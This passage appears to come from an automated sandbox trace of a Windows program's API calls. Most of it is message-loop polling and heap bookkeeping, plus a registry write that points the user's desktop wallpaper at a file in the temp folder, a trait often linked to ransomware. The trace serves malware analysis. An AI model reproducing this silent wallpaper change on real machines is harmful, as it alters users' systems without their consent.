wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0298.272] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0298.273] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0298.273] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0298.273] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0298.273] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.273] Sleep (dwMilliseconds=0xa) [0298.288] timeGetTime () returned 0x4a8ac [0298.288] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.288] Sleep (dwMilliseconds=0xa) [0298.304] timeGetTime () returned 0x4a8bb [0298.304] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.304] Sleep (dwMilliseconds=0xa) [0298.319] timeGetTime () returned 0x4a8cb [0298.319] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.319] Sleep (dwMilliseconds=0xa) [0298.335] timeGetTime () returned 0x4a8db [0298.335] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.335] Sleep (dwMilliseconds=0xa) [0298.350] timeGetTime () returned 0x4a8ea [0298.350] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.351] Sleep (dwMilliseconds=0xa) [0298.366] timeGetTime () returned 0x4a8fa [0298.366] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.366] Sleep (dwMilliseconds=0xa) [0298.382] timeGetTime () returned 0x4a909 [0298.382] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.382] Sleep (dwMilliseconds=0xa) [0298.397] timeGetTime () returned 0x4a919 [0298.397] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.397] Sleep (dwMilliseconds=0xa) [0298.417] timeGetTime () returned 0x4a929 [0298.418] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.418] Sleep (dwMilliseconds=0xa) [0298.429] timeGetTime () returned 0x4a938 [0298.429] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.429] Sleep (dwMilliseconds=0xa) [0298.444] timeGetTime () returned 0x4a948 [0298.444] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.444] Sleep (dwMilliseconds=0xa) [0298.460] timeGetTime () returned 0x4a957 [0298.460] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.460] Sleep (dwMilliseconds=0xa) [0298.475] timeGetTime () returned 0x4a967 [0298.475] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.475] Sleep (dwMilliseconds=0xa) [0298.491] timeGetTime () returned 0x4a977 [0298.491] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.491] Sleep (dwMilliseconds=0xa) [0298.506] timeGetTime () returned 0x4a986 [0298.506] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.507] Sleep (dwMilliseconds=0xa) [0298.522] timeGetTime () returned 0x4a996 [0298.522] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.522] Sleep (dwMilliseconds=0xa) [0298.537] timeGetTime () returned 0x4a9a5 [0298.538] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.538] Sleep (dwMilliseconds=0xa) [0298.553] timeGetTime () returned 0x4a9b5 [0298.553] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.553] Sleep (dwMilliseconds=0xa) [0298.569] timeGetTime () returned 0x4a9c5 [0298.569] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.569] Sleep (dwMilliseconds=0xa) [0298.584] timeGetTime () returned 0x4a9d4 [0298.584] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.585] Sleep (dwMilliseconds=0xa) [0298.600] timeGetTime () returned 0x4a9e4 [0298.600] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.600] Sleep (dwMilliseconds=0xa) [0298.615] timeGetTime () returned 0x4a9f3 [0298.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0298.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0298.616] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0298.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0298.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0298.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0298.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0298.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0298.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0298.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0298.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0298.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0298.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0298.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0298.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0298.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0298.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0298.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0298.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0298.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0298.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0298.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0298.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0298.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0298.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0298.617] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0298.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0298.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0298.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6e8 [0298.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0298.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0298.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa748 [0298.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0298.617] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0298.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0298.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0298.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0298.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0298.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0298.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0298.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0298.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0298.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0298.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0298.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0298.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0298.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0298.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0298.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0298.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0298.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0298.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0298.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0298.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0298.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0298.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0298.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0298.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0298.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0298.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0298.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0298.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0298.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0298.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0298.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0298.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b35e0 [0298.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0298.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0298.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0298.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0298.620] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0298.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0298.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0298.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0298.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0298.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0298.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0298.621] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8bf858, lpdwDisposition=0x8bf874 | out: phkResult=0x8bf858*=0x294, lpdwDisposition=0x8bf874*=0x2) returned 0x0 [0298.621] RegSetValueExW (in: hKey=0x294, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg", cbData=0x58 | out: lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0298.621] RegCloseKey (hKey=0x294) returned 0x0 [0298.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35e0 | out: hHeap=0x25c0000) returned 1 [0298.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0298.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0298.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0298.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0298.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0298.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0298.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0298.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0298.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0298.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0298.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0298.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0298.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0298.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0298.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0298.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0298.622] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0298.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0298.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0298.622] CharUpperBuffW (in: lpsz="A4200F01243", cchLength=0xb | out: lpsz="A4200F01243") returned 0xb [0298.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0298.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0298.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0298.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1438 [0298.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0298.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0298.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0298.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0298.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0298.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0298.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0298.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0298.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0298.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0298.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0298.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0298.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0298.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0298.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0298.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0298.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa910 [0298.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0298.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0298.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0298.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0298.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0298.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0298.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0298.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0298.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0298.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0298.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0298.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0298.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0298.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3b8 [0298.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab08 [0298.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0298.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0298.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0298.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0298.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0298.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0298.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0298.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0298.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0298.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0298.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0298.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0298.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab08 [0298.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3b8 [0298.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0298.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0298.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0298.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0298.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0298.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0298.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0298.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0298.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0298.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0298.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0298.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0298.628] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0298.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0298.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0298.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0298.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0298.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0298.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0298.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0298.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0298.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0298.629] CharUpperBuffW (in: lpsz="SSA4200F01243", cchLength=0xd | out: lpsz="SSA4200F01243") returned 0xd [0298.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0298.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0298.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0298.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0298.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0298.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0298.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 